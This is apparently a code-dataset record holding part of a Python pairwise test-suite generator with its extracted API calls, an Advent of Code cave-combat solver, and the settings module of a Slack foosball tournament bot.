dbg("#DBG (parseValue, looking at ", Token, ")")
if tokenClass( Token ) != ValueToken :
print_("Syntax error, expecting value, saw ", Token )
return [ "--bogus--"]
value = [ Token ]
Token = six.next(tokenStream)
conditions = parseConditions()
dbg("#DBG parseValue returns", value + conditions)
return value + conditions
def parseConditions():
global Token
dbg("#DBG (parseConditions)")
if tokenClass( Token ) == ErrorToken :
Token = six.next(tokenStream)
return [("error", None )] + parseConditions()
if tokenClass( Token ) == SingleToken :
Token = six.next(tokenStream)
return [("single", None)] + parseConditions()
if tokenClass( Token ) == IfToken :
Token = six.next(tokenStream)
ifcond = Token
Token = six.next(tokenStream)
return [("if" , ifcond)] + parseConditions()
if tokenClass( Token ) == PropToken :
Token = six.next(tokenStream)
condname = Token
Token = six.next(tokenStream)
return [("prop" , condname)] + parseConditions()
if tokenClass( Token ) == ExceptToken :
Token = six.next(tokenStream)
condname = Token
Token = six.next(tokenStream)
return [("except" , condname)] + parseConditions()
dbg("#DBG No more conditions")
return [ ]
# -------------- The form of a pair (obligation or exclusion) -----
def makePair( s1, v1, s2, v2 ):
return ((s1, v1), (s2, v2))
def reversePair( pair ):
return ( pair[1], pair[0] )
# Each item in the pair is a <slot,value> or <name,value> pair
def slotOf( tuple ):
return tuple[0]
def nameOf( tuple ):
return tuple[0]
def valOf( tuple ):
return tuple[1]
# --------------- Build initial data structures ----
# Single columns are those in which all but one value is
# listed as a "single" or "error" choice, i.e., for pairs
# generation the value will be fixed. We can save some time by
# always fixing these at the beginning of pairs generation, and
# we can save space in output by suppressing them.
# (Note they may still participate in excludes.)
#
# We'll identify the multiples (non-single columns) as well,
# because they are useful in several places
#
def identifySingles() :
for slot in range(len(CategoriesList)) :
if len(CategoriesValues[slot]) == 0 :
print_("Warning: No non-singular value choices for ",
CategoriesList[slot],
"; Pairs generation will fail.")
elif len(CategoriesValues[slot]) == 1 :
SingleColumns.append(slot)
else:
MultipleColumns.append(slot)
# Obligations depend on excludes, so call makeExcludes before
# calling makeObligations
#
def makeExcludes() :
# Excludes that come from "except" clauses
for ExceptCond in ValueExcepts :
val, slot, cond = ExceptCond
for conflict_slot in PropsSlots[ cond ] :
for cs_value in CategoriesValues[ conflict_slot ] :
if cond in ValueProps[ (conflict_slot, cs_value) ] :
Excludes.add( makePair( slot, val, conflict_slot, cs_value))
# Excludes that come from "if" clauses --- reverse sense
for IfCond in ValueIfs :
val, slot, cond = IfCond
for conflict_slot in PropsSlots[ cond ] :
for cs_value in CategoriesValues[ conflict_slot ] :
if cond not in ValueProps[ (conflict_slot, cs_value) ] :
Excludes.add( makePair( slot, val, conflict_slot, cs_value))
def makeObligations() :
if DBG:
print_("--- Creating obligations list ---")
keys = CategoriesList
nslots = len(keys)
for i in range(nslots):
ObsByCol[i] = []
for i in MultipleColumns :
for v1 in CategoriesValues[i] :
i_item = (i, v1)
for j in range(i+1,nslots) :
## if j in SingleColumns: continue ##
## --- short cut doesn't work if only one varying column --
for v2 in CategoriesValues[j] :
j_item = (j, v2)
obforward = (i_item, j_item)
obbackward = (j_item, i_item)
if obforward not in Excludes and obbackward not in Excludes:
ObsList.append(obforward)
Outstanding.add(obforward)
ObsByCol[ i ].append(obforward)
ObsByCol[ j ].append(obbackward)
random.shuffle(ObsList)
dbg("--- ObsList complete, ", len(ObsList), " obligations ---")
# When we complete a test case, we remove obligations from
# the outstanding obligations list. The other lists are
# cleared lazily, when we bring up an obligation.
#
def clearObligations(testcase) :
testCaseValue = 0
for i in range( len(testcase) ):
for j in range ( i+1, len(testcase) ):
ob = makePair(i, testcase[i], j, testcase[j])
if ob in Outstanding:
Outstanding.remove(ob)
testCaseValue = testCaseValue + 1
dbg("*** Value ", testCaseValue, testcase )
# ---------------------------------------------------------
#
# Is a given (slot,value) pair compatible with the test case so far?
#
def compatible( item, testcase ) :
slot, val = item
if ( testcase[ slot ] != DontCare and testcase[slot] != val) :
return False
for tslot in range(len(testcase)) :
if ((slot, val), (tslot, testcase[tslot])) in Excludes:
return False
if ((tslot, testcase[tslot]),(slot,val)) in Excludes:
return False
return True
# ---------------------------------------------------------
def MakeTuple ( len ):
newList = []
for i in range(0,len):
newList.append(DontCare)
return newList
def CreateCase():
seedObligation = ObsList.pop()
while seedObligation not in Outstanding:
if (len(ObsList) == 0): return
seedObligation = ObsList.pop()
s1, v1 = seedObligation[0]
s2, v2 = seedObligation[1]
testcase = MakeTuple( len(CategoriesList) )
testcase[s1] = v1
testcase[s2] = v2
for slot in SingleColumns :
testcase[slot] = CategoriesValues[slot][0]
dbg("#DBG === Attempting tuple seeded with", testcase)
columnOrder = list(range( len(CategoriesList) ) )
random.shuffle(columnOrder)
if ( completeCase( columnOrder, testcase ) ) :
Suite.append( testcase )
clearObligations( testcase )
else:
CaseMessage( "Warning - No pair possible: ", testcase )
def CreateSingles():
for single in Singles:
CreateSingle(single)
def CreateSingle( single ):
testcase = MakeTuple( len(CategoriesList) )
columnOrder = list(range( len(CategoriesList) ) )
random.shuffle(columnOrder)
value, slot, kind = single
dbg("#DBG single obligation: ", slot, value, kind)
testcase[slot] = value
if completeCase( columnOrder, testcase ) :
Suite.append( testcase )
else:
CaseMessage( "Warning - No pair possible: ", testcase )
def completeCase( columnOrder, testcase ) :
if len (columnOrder) == 0 :
dbg_p("#DBG: *** Success: ", testcase)
return True
dbg_p("#DBG * Attempting to complete", testcase )
col = columnOrder[0]
if testcase[col] != DontCare:
dbg_p("#DBG * Skipping column ", col, " (already filled in)")
return completeCase( columnOrder[1:], testcase )
dbg("#DBG ***Trying columns ", columnOrder, " in ", testcase)
# How shall we fill this DontCare with something useful?
# Let's try for an outstanding obligation.
# Dec 2006 --- Let's look at all the outstanding obligations
# and choose the one with highest score. This is fairly expensive
# (10^20 takes about 9 minutes wall time on G4 laptop), so now we
# set a limit (maxCandidates) on number of candidates considered
colObs = ObsByCol[col]
candidates = [ ]
obindex = 0
while obindex < len(colObs) and len(candidates) < maxCandidates :
ob = colObs[obindex]
if not (ob in Outstanding or reversePair(ob) in Outstanding):
# Here is our lazy deletion of obligations; we
# clip from the end of the list
dbg_p("#DBG * Lazy deletion")
colObs[obindex] = colObs[ len(colObs) - 1 ]
colObs.pop()
else:
if compatible(ob[0], testcase) and compatible(ob[1], testcase):
dbg_p("#DBG *** Compatible", ob, testcase )
# Score the
# Note one (but not both) of these may coincide with
# an existing element. We'll only consider *added* value,
# so we score the *new* parts only.
value = 1 ## For at least meeting one obligation
((s1, v1), (s2, v2)) = ob
if testcase[s1] != v1 :
for ccol in range( len(testcase) ):
if ((s1,v1),(ccol,testcase[ccol])) in Outstanding :
value = value + 1
if ((ccol,testcase[ccol]),(s1,v1)) in Outstanding :
value = value + 1
if testcase[s2] != v2 :
for ccol in range( len(testcase) ):
if ((s2,v2),(ccol,testcase[ccol])) in Outstanding :
value = value + 1
if ((ccol,testcase[ccol]),(s2,v2)) in Outstanding :
value = value + 1
candidates.append( (value, ob) )
obindex = obindex + 1
candidates.sort()
candidates.reverse()
dbg_p("### Candidates: ", candidates)
for cand in candidates:
(score, ((s1, v1),(s2,v2))) = cand
old_v1 = testcase[ s1 ]
testcase[ s1 ] = v1
old_v2 = testcase[ s2 ]
testcase[ s2 ] = v2
if completeCase( columnOrder[1:] , testcase ):
return True
else:
dbg_p("#DBG *** Rolling back ", s1, s2)
# Restore previous values
testcase[ s1 ] = old_v1
testcase[ s2 ] = old_v2
## If we couldn't score any more obligations, can we at least
## fill in some compatible value and move on?
dbg_p("#DBG *** Trying any value, regardless of obligation")
for val in CategoriesValues[ col ] :
if compatible((col,val), testcase) :
testcase[ col ] = val
if completeCase( columnOrder[1:], testcase ):
return True
else:
testcase[ col ] = DontCare
dbg_p("#DBG ** Failing to fill column ", col , " with ", testcase)
return False
# ------------------------------------------------------------
# Print Warnings (to stderr unless otherwise specified)
# ------------------------------------------------------------
def CaseMessage( msg, vector, dest=sys.stderr ) :
"""Print a warning or error message concerning a
particular partially-defined test vector"""
print_( "{} [".format(msg), end="", file=dest)
sep=""
for col in range(len(vector)) :
if vector[col] == DontCare :
print_(sep+"_",end="", file=dest)
else:
print_("{}{}={}".format(sep,CategoriesList[col],vector[col]),
end="", file=dest)
sep=", "
print_("]",file=dest)
def ObToVector( ob ) :
"""Convert obligation to vector for debugging messages"""
t = MakeTuple( NCol )
s1,v1 = ob[0]
s2,v2 = ob[1]
t[s1]=v1
t[s2]=v2
return t
# ------------------------------------------------------------
# Print results
# ------------------------------------------------------------
def PrintTable( columns, descriptive_title ) :
if UserOptions.output_format == "csv" :
PrintAsCSV( columns )
else:
PrintAsText( columns, descriptive_title )
def PrintAsText( columns, descriptive_title ):
print_(descriptive_title + ":", len(Suite), " test vectors")
print_("")
for slot in columns :
parm = CategoriesList[ slot ]
print_("%15s" % parm , end="")
print_("")
print_("_"*60)
for t in Suite :
for slot in columns :
value = t[slot]
print_("%15s" % value , end="")
print_( "" )
print_( "" )
def PrintAsCSV(columns):
""" Print vectors as comma-separated values, for import
into a spreadsheet or other CSV-consuming application. """
dbg("Print as CSV")
csv_writer = csv.writer( sys.stdout, dialect=csv.excel )
schema_row = [ ]
for slot in columns :
schema_row.append( CategoriesList[slot] )
csv_writer.writerow(schema_row)
for t in Suite :
dbg("write row " , t )
csv_writer.writerow( t )
# ----------------
## Read an initial test suite (or several), and
## eliminate those obligations, so we are creating
## a test suite to fill in the remainder of the test
## obligations.
##
## NOTE: Currently considering only pair obligations,
## not singletons. We should look at single and error
## cases first, and
## * Not consider any test case with more than one
## single or error value (we don't know which will be handled
## by the application, and we assume special case processing
## may miss other features, including other special cases)
## * Not consider any pairs as being satisfied by a single
## or error case.
## For now, we just assume that the initial test suite is not
## a suite of special and error cases.
##
class csv_dialect(csv.excel):
skipinitialspace=True ## Seems to have no effect
def initial_suite_clear( initial_suite ) :
matches = False
reader = csv.reader( open(initial_suite, "r"),
csv_dialect) ## Working yet? (No.)
## First line should be schema
    in_schema = six.next(reader)
in_schema_map = [ ]
for i in range(len(in_schema)):
col = in_schema[i]
if col in CategoriesList:
to_col = CategoriesList.index(col)
in_schema_map.append(to_col)
else:
print_("Warning: schema mismatch in", initial_suite)
print_(" Column ", i, "'" + col + "'", "not in specification")
in_schema_map.append(-1)
for vec in reader:
if len(vec) == len(in_schema) :
trvec = MakeTuple(len(CategoriesList))
for i in range(len(vec)) :
if in_schema_map[i] != -1 :
trvec[in_schema_map[i]] = vec[i]
clearObligations( trvec )
else:
print_("*** Warning, format mismatch with initial suite ",
initial_suite)
print_("*** Expecting columns ",
in_schema , " but saw ", vec)
# ----------------
## Print the set of outstanding obligations. Typical use is when
## we are trying to see what is missing in an initial test suite.
##
def print_required_pairs( ) :
for ob in Outstanding :
s1, v1 = ob[0]
name1=CategoriesList[s1]
s2, v2 = ob[1]
name2=CategoriesList[s2]
print_("%s=%s, %s=%s" % (name1, v1, name2, v2))
## ------------------------------------------------------------
## MAIN PROGRAM (after initialization above)
## ------------------------------------------------------------
# -- Respond to special diagnostic options --
if UserOptions.license:
print_(License)
exit(0)
if UserOptions.debug:
print_("---------------------------")
print_("Options in effect: ")
print_("debug: ", UserOptions.debug)
print_("output_format:", UserOptions.output_format)
print_("varying:", UserOptions.varying)
print_("combinations:", UserOptions.combinations)
print_("singles:", UserOptions.singles)
print_("initial_suite:", UserOptions.initial_suite)
print_("pairs:", UserOptions.pairs)
print_("---------------------------")
# -- Main processing: Parse the script, execute, print --
parse()
identifySingles()
makeExcludes()
makeObligations()
for suite in UserOptions.initial_suite :
initial_suite_clear( suite )
if UserOptions.pairs :
print_("=== Pairs required for completion ===" )
print_required_pairs()
print_("=====================================")
if UserOptions.combinations :
while len(ObsList) > 0 :
CreateCase()
if UserOptions.varying :
PrintTable( MultipleColumns, "Pairwise coverage, varying columns only" )
else:
PrintTable( range(len(CategoriesList)), "Pairwise coverage" )
if UserOptions.singles :
Suite = [ ]
CreateSingles()
PrintTable( range(len(CategoriesList)), "Single and error vectors" )
|
[
"six.next",
"csv.writer",
"optparse.OptionParser",
"logging.basicConfig",
"random.shuffle",
"sys.stdin.readline",
"six.print_",
"logging.getLogger"
] |
[((3980, 4058), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s:%(message)s"""', 'level': 'logging.WARNING'}), "(format='%(levelname)s:%(message)s', level=logging.WARNING)\n", (3999, 4058), False, 'import logging\n'), ((4089, 4116), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4106, 4116), False, 'import logging\n'), ((4434, 4459), 'optparse.OptionParser', 'OptionParser', ([], {'usage': 'usage'}), '(usage=usage)\n', (4446, 4459), False, 'from optparse import OptionParser\n'), ((6584, 6612), 'six.print_', 'print_', (['"""Enabling debugging"""'], {}), "('Enabling debugging')\n", (6590, 6612), False, 'from six import print_\n'), ((9043, 9064), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (9051, 9064), False, 'import six\n'), ((9709, 9730), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (9717, 9730), False, 'import six\n'), ((11687, 11708), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (11695, 11708), False, 'import six\n'), ((16004, 16027), 'random.shuffle', 'random.shuffle', (['ObsList'], {}), '(ObsList)\n', (16018, 16027), False, 'import random\n'), ((17879, 17906), 'random.shuffle', 'random.shuffle', (['columnOrder'], {}), '(columnOrder)\n', (17893, 17906), False, 'import random\n'), ((18323, 18350), 'random.shuffle', 'random.shuffle', (['columnOrder'], {}), '(columnOrder)\n', (18337, 18350), False, 'import random\n'), ((22969, 22991), 'six.print_', 'print_', (['"""]"""'], {'file': 'dest'}), "(']', file=dest)\n", (22975, 22991), False, 'from six import print_\n'), ((23630, 23640), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23636, 23640), False, 'from six import print_\n'), ((23750, 23760), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23756, 23760), False, 'from six import print_\n'), ((23765, 23781), 'six.print_', 'print_', (["('_' * 60)"], {}), "('_' * 60)\n", (23771, 23781), False, 'from six import print_\n'), ((23931, 23941), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23937, 23941), False, 'from six import print_\n'), ((24140, 24181), 'csv.writer', 'csv.writer', (['sys.stdout'], {'dialect': 'csv.excel'}), '(sys.stdout, dialect=csv.excel)\n', (24150, 24181), False, 'import csv\n'), ((27055, 27070), 'six.print_', 'print_', (['License'], {}), '(License)\n', (27061, 27070), False, 'from six import print_\n'), ((27111, 27148), 'six.print_', 'print_', (['"""---------------------------"""'], {}), "('---------------------------')\n", (27117, 27148), False, 'from six import print_\n'), ((27153, 27182), 'six.print_', 'print_', (['"""Options in effect: """'], {}), "('Options in effect: ')\n", (27159, 27182), False, 'from six import print_\n'), ((27187, 27223), 'six.print_', 'print_', (['"""debug: """', 'UserOptions.debug'], {}), "('debug: ', UserOptions.debug)\n", (27193, 27223), False, 'from six import print_\n'), ((27228, 27279), 'six.print_', 'print_', (['"""output_format:"""', 'UserOptions.output_format'], {}), "('output_format:', UserOptions.output_format)\n", (27234, 27279), False, 'from six import print_\n'), ((27284, 27323), 'six.print_', 'print_', (['"""varying:"""', 'UserOptions.varying'], {}), "('varying:', UserOptions.varying)\n", (27290, 27323), False, 'from six import print_\n'), ((27328, 27377), 'six.print_', 'print_', (['"""combinations:"""', 'UserOptions.combinations'], {}), "('combinations:', UserOptions.combinations)\n", (27334, 27377), False, 'from six import print_\n'), ((27382, 27421), 'six.print_', 'print_', (['"""singles:"""', 'UserOptions.singles'], {}), "('singles:', UserOptions.singles)\n", (27388, 27421), False, 'from six import print_\n'), ((27426, 27477), 'six.print_', 'print_', (['"""initial_suite:"""', 'UserOptions.initial_suite'], {}), "('initial_suite:', UserOptions.initial_suite)\n", (27432, 27477), False, 'from six import print_\n'), ((27482, 27517), 'six.print_', 'print_', (['"""pairs:"""', 'UserOptions.pairs'], {}), "('pairs:', UserOptions.pairs)\n", (27488, 27517), False, 'from six import print_\n'), ((27522, 27559), 'six.print_', 'print_', (['"""---------------------------"""'], {}), "('---------------------------')\n", (27528, 27559), False, 'from six import print_\n'), ((27790, 27837), 'six.print_', 'print_', (['"""=== Pairs required for completion ==="""'], {}), "('=== Pairs required for completion ===')\n", (27796, 27837), False, 'from six import print_\n'), ((27871, 27918), 'six.print_', 'print_', (['"""====================================="""'], {}), "('=====================================')\n", (27877, 27918), False, 'from six import print_\n'), ((8589, 8609), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (8607, 8609), False, 'import sys\n'), ((9265, 9326), 'six.print_', 'print_', (['"""Syntax error on """', 'Token', '""" looking for 'category:'"""'], {}), '(\'Syntax error on \', Token, " looking for \'category:\'")\n', (9271, 9326), False, 'from six import print_\n'), ((9335, 9370), 'six.print_', 'print_', (['"""Skipping to next category"""'], {}), "('Skipping to next category')\n", (9341, 9370), False, 'from six import print_\n'), ((9638, 9668), 'six.print_', 'print_', (['"""Resuming from"""', 'Token'], {}), "('Resuming from', Token)\n", (9644, 9668), False, 'from six import print_\n'), ((11568, 11620), 'six.print_', 'print_', (['"""Syntax error, expecting value, saw """', 'Token'], {}), "('Syntax error, expecting value, saw ', Token)\n", (11574, 11620), False, 'from six import print_\n'), ((11967, 11988), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (11975, 11988), False, 'import six\n'), ((12104, 12125), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12112, 12125), False, 'import six\n'), ((12237, 12258), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12245, 12258), False, 'import six\n'), ((12299, 12320), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12307, 12320), False, 'import six\n'), ((12433, 12454), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12441, 12454), False, 'import six\n'), ((12497, 12518), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12505, 12518), False, 'import six\n'), ((12637, 12658), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12645, 12658), False, 'import six\n'), ((12701, 12722), 'six.next', 'six.next', (['tokenStream'], {}), '(tokenStream)\n', (12709, 12722), False, 'import six\n'), ((15115, 15158), 'six.print_', 'print_', (['"""--- Creating obligations list ---"""'], {}), "('--- Creating obligations list ---')\n", (15121, 15158), False, 'from six import print_\n'), ((23714, 23743), 'six.print_', 'print_', (["('%15s' % parm)"], {'end': '""""""'}), "('%15s' % parm, end='')\n", (23720, 23743), False, 'from six import print_\n'), ((23914, 23924), 'six.print_', 'print_', (['""""""'], {}), "('')\n", (23920, 23924), False, 'from six import print_\n'), ((26753, 26800), 'six.print_', 'print_', (["('%s=%s, %s=%s' % (name1, v1, name2, v2))"], {}), "('%s=%s, %s=%s' % (name1, v1, name2, v2))\n", (26759, 26800), False, 'from six import print_\n'), ((13865, 13977), 'six.print_', 'print_', (['"""Warning: No non-singular value choices for """', 'CategoriesList[slot]', '"""; Pairs generation will fail."""'], {}), "('Warning: No non-singular value choices for ', CategoriesList[slot],\n '; Pairs generation will fail.')\n", (13871, 13977), False, 'from six import print_\n'), ((22767, 22803), 'six.print_', 'print_', (["(sep + '_')"], {'end': '""""""', 'file': 'dest'}), "(sep + '_', end='', file=dest)\n", (22773, 22803), False, 'from six import print_\n'), ((23874, 23904), 'six.print_', 'print_', (["('%15s' % value)"], {'end': '""""""'}), "('%15s' % value, end='')\n", (23880, 23904), False, 'from six import print_\n'), ((25742, 25794), 'six.print_', 'print_', (['"""Warning: schema mismatch in"""', 'initial_suite'], {}), "('Warning: schema mismatch in', initial_suite)\n", (25748, 25794), False, 'from six import print_\n'), ((25807, 25870), 'six.print_', 'print_', (['""" Column """', 'i', '("\'" + col + "\'")', '"""not in specification"""'], {}), '(\' Column \', i, "\'" + col + "\'", \'not in specification\')\n', (25813, 25870), False, 'from six import print_\n'), ((26230, 26303), 'six.print_', 'print_', (['"""*** Warning, format mismatch with initial suite """', 'initial_suite'], {}), "('*** Warning, format mismatch with initial suite ', initial_suite)\n", (26236, 26303), False, 'from six import print_\n'), ((26333, 26394), 'six.print_', 'print_', (['"""*** Expecting columns """', 'in_schema', '""" but saw """', 'vec'], {}), "('*** Expecting columns ', in_schema, ' but saw ', vec)\n", (26339, 26394), False, 'from six import print_\n'), ((9529, 9562), 'six.print_', 'print_', (['"""Discarding rest of file"""'], {}), "('Discarding rest of file')\n", (9535, 9562), False, 'from six import print_\n'), ((11052, 11107), 'six.print_', 'print_', (['"""*ERR* Unrecognized condition attribute:"""', 'cond'], {}), "('*ERR* Unrecognized condition attribute:', cond)\n", (11058, 11107), False, 'from six import print_\n')]
|
from dataclasses import dataclass
from typing import List, NamedTuple
import numpy as np
from generic_search import bfsCave, nodeToPath
wall = "#"
emptySpace = "."
class GridLocation(NamedTuple):
column: int
row: int
def __lt__(self, other):
return self.row < other.row or \
self.row == other.row and self.column < other.column
def openLocations(cave, location: GridLocation) -> List[GridLocation]:
"""
Return a list of the open locations around the given location. The locations are
in reading order.
"""
available = []
row = cave[location.row]
if location.row > 0 and cave[location.row - 1, location.column] == ".":
available.append(GridLocation(location.column, location.row - 1))
if location.column > 0 and row[location.column - 1] == ".":
available.append(GridLocation(location.column - 1, location.row))
if location.column + 1 < len(row) and row[location.column + 1] == ".":
available.append(GridLocation(location.column + 1, location.row))
if location.row + 1 < len(cave) and cave[location.row + 1, location.column] == ".":
available.append(GridLocation(location.column, location.row + 1))
return sorted(available)
def reachedLocation(currentLocation, goalLocation):
return abs(currentLocation.row - goalLocation.row) + abs(currentLocation.column - goalLocation.column) == 1
@dataclass
class Unit:
x: int
y: int
race: str
hitPoints: int = 200
attackDamage: int = 3
def __str__(self):
return f"{self.race}({self.hitPoints})"
def __lt__(self, other):
if self.y != other.y:
return self.y < other.y
return self.x < other.x
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def location(self):
return GridLocation(self.x, self.y)
def sameLocation(self, other):
"""
Return True if this unit is at the same location as other
"""
return self.x == other.x and self.y == other.y
def atLocation(self, x, y):
"""
Return True if this unit is at this x,y location
"""
return self.x == x and self.y == y
def distanceTo(self, other):
"""
Return the Manhattan distance between this unit and other
Keyword arguments:
other -- The other unit.
"""
return abs(self.x - other.x) + abs(self.y - other.y)
def canAttack(self, units):
"""
Return True if there is an enemy available to attack.
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
"""
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and self.distanceTo(unit) == 1:
return True
return False
def enemyExists(self, units):
"""
Return True if an enemy exists. The enemy does not need to be available for attack.
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
"""
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race:
return True
return False
def availableEnemies(self, cave, units):
"""
Return a list of available enemies in the list
Keyword arguments:
units -- A list of all units. Does not need to be sorted.
cave -- The array representing the cave
"""
availableList = []
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and openLocations(cave, unit.location()):
availableList.append(unit)
return availableList
def move(self, cave, units) -> None:
targetLocation: GridLocation = None
shortestPath = None
enemies = self.availableEnemies(cave, units)
for enemy in enemies:
solution = bfsCave(self.location(), enemy.location(), reachedLocation, cave, openLocations)
if solution:
path = nodeToPath(solution)
# We found a path. Now see if it's a better candidate than one already found
pathEnd = path[-1]
if shortestPath is None or len(path) < len(shortestPath) or \
len(path) == len(shortestPath) and (pathEnd < targetLocation):
targetLocation = pathEnd
shortestPath = path
if shortestPath:
cave[self.y, self.x] = '.'
# The first step in the path is the current location so go to the second step
nextLocation: GridLocation = shortestPath[1]
self.x = nextLocation.column
self.y = nextLocation.row
cave[self.y, self.x] = self.race
def attack(self, cave, units):
"""
Attack an available enemy.
units -- A list of all units. Does not need to be sorted.
"""
target = None
for unit in units:
if unit.hitPoints > 0 and unit.race != self.race and self.distanceTo(unit) == 1:
if target is None or unit.hitPoints < target.hitPoints or \
unit.hitPoints == target.hitPoints and unit < target:
target = unit
if target is not None:
target.hitPoints -= self.attackDamage
if target.hitPoints <= 0:
cave[target.y, target.x] = "."
def printCave(cave, units, showScores=False):
for rowNumber, row in enumerate(cave):
scores = " "
for columnNumber, cell in enumerate(row):
print(cell, end='')
if showScores and cell in ["E", "G"]:
unit = next(unit for unit in units if unit.hitPoints > 0 and unit.atLocation(columnNumber, rowNumber))
scores += str(unit) + " "
if len(scores.strip()):
print(scores, end='')
print()
def loadPuzzle(puzzleName, elfAttackPower):
# Get the dimensions of the puzzle.
with open(puzzleName, "r") as infile:
puzzleHeight = 0
puzzleWidth = 0
for line in infile:
puzzleHeight += 1
puzzleWidth = max(puzzleWidth, len(line.rstrip()))
# Create the cave with the determined puzzle dimensions.
cave = np.full((puzzleHeight, puzzleWidth), '.', dtype=str)
units = []
# Populate the cave and the list of units.
with open(puzzleName, "r") as infile:
for rowNumber, line in enumerate(infile):
for columnNumber, cell in enumerate(line.rstrip()):
if cell in ['E', 'G']:
units.append(Unit(columnNumber, rowNumber, cell, attackDamage=3 if cell == 'G' else elfAttackPower))
cave[rowNumber, columnNumber] = cell
return cave, units
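# Part 1 solution below: the guard string "15a" can never equal __main__, so
# this block never runs (presumably disabled on purpose once part 2, in the
# real __main__ block further down, was the goal).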
if __name__ == "15a":
cave, units = loadPuzzle("15.txt", 3)
finished = False
playRound = 0
while not finished:
for unit in units:
if unit.hitPoints <= 0:
continue
if not unit.enemyExists(units):
finished = True
break
if not unit.canAttack(units):
unit.move(cave, units)
unit.attack(cave, units)
if not finished:
playRound += 1
print(playRound)
livingUnits = [unit for unit in units if unit.hitPoints > 0]
units = sorted(livingUnits)
if __name__ == "__main__":
goblinsWin = True
elfAttackPower = 3
originalElfCount = 0
survivingElfCount = 0
while goblinsWin or survivingElfCount < originalElfCount:
elfAttackPower += 1
cave, units = loadPuzzle("15.txt", elfAttackPower)
originalElfCount = len([unit for unit in units if unit.race == "E"])
finished = False
playRound = 0
while not finished:
for unit in units:
if unit.hitPoints <= 0:
continue
if not unit.enemyExists(units):
finished = True
break
if not unit.canAttack(units):
unit.move(cave, units)
unit.attack(cave, units)
survivingElfCount = len([unit for unit in units if unit.race == "E" and unit.hitPoints > 0])
if survivingElfCount < originalElfCount:
finished = True
break
if not finished:
playRound += 1
print(playRound)
livingUnits = [unit for unit in units if unit.hitPoints > 0]
units = sorted(livingUnits)
goblinsWin = units[0].race == "G"
printCave(cave, units, showScores=True)
print(f"Combat ends after {playRound} full rounds")
hitPoints = sum([unit.hitPoints for unit in units])
survivingRace = "Goblins" if units[0].race == "G" else "Elves"
print(f"{survivingRace} win with {hitPoints} total hit points left")
print(f"Outcome: {playRound} * {hitPoints} = {playRound * hitPoints}")
print(f"Elf attack power: {elfAttackPower}")
|
[
"numpy.full",
"generic_search.nodeToPath"
] |
[((6315, 6367), 'numpy.full', 'np.full', (['(puzzleHeight, puzzleWidth)', '"""."""'], {'dtype': 'str'}), "((puzzleHeight, puzzleWidth), '.', dtype=str)\n", (6322, 6367), True, 'import numpy as np\n'), ((4063, 4083), 'generic_search.nodeToPath', 'nodeToPath', (['solution'], {}), '(solution)\n', (4073, 4083), False, 'from generic_search import bfsCave, nodeToPath\n')]
|
from datetime import time, timedelta
# Will print all read events to stdout.
DEBUG = False
DATA_PATH = "~/.tourney"
CHANNEL_NAME = "foosball"
RTM_READ_DELAY = 0.5 # seconds
RECONNECT_DELAY = 5.0 # seconds
COMMAND_REGEX = "!(\\w+)\\s*(.*)"
REACTION_REGEX = ":(.+):"
SCORE_ARGS_REGEX = "(T\\d+)\\s+(\\d+)\\s+(T\\d+)\\s+(\\d+)"
WIN_ARGS_REGEX = "(\\d+)\\s+(\\d+)"
MORNING_ANNOUNCE = time(9)
MORNING_ANNOUNCE_DELTA = timedelta(hours=1)
REMINDER_ANNOUNCE = time(11)
REMINDER_ANNOUNCE_DELTA = timedelta(minutes=49)
MIDDAY_ANNOUNCE = time(11, 50)
MIDDAY_ANNOUNCE_DELTA = timedelta(minutes=10)
POSITIVE_REACTIONS = [
"+1",
"the_horns",
"metal",
"raised_hands",
"ok",
"ok_hand",
"fire",
"tada",
"confetti_ball"
]
NEGATIVE_REACTIONS = ["-1", "middle_finger"]
PRIVILEGED_COMMANDS = ["undoteams", "generate", "autoupdate"]
TEAM_NAMES = [
"Air Farce",
"Cereal Killers",
"Dangerous Dynamos",
"Designated Drinkers",
"Fire Breaking Rubber Duckies",
"Game of Throw-ins",
"Injured Reserve",
"One Hit Wonders",
"Our Uniforms Match",
"Pique Blinders",
"Pistons from the Past",
"Purple Cobras",
"Rabid Squirrels",
"Raging Nightmare",
"Recipe for Disaster",
"Shockwave",
"Smarty Pints",
"Straight off the Couch",
"Tenacious Turtles",
"The Abusement Park",
"The Flaming Flamingos",
"The League of Ordinary Gentlemen",
"The Meme Team",
"The Mullet Mafia",
"Thunderpants",
]
|
[
"datetime.time",
"datetime.timedelta"
] |
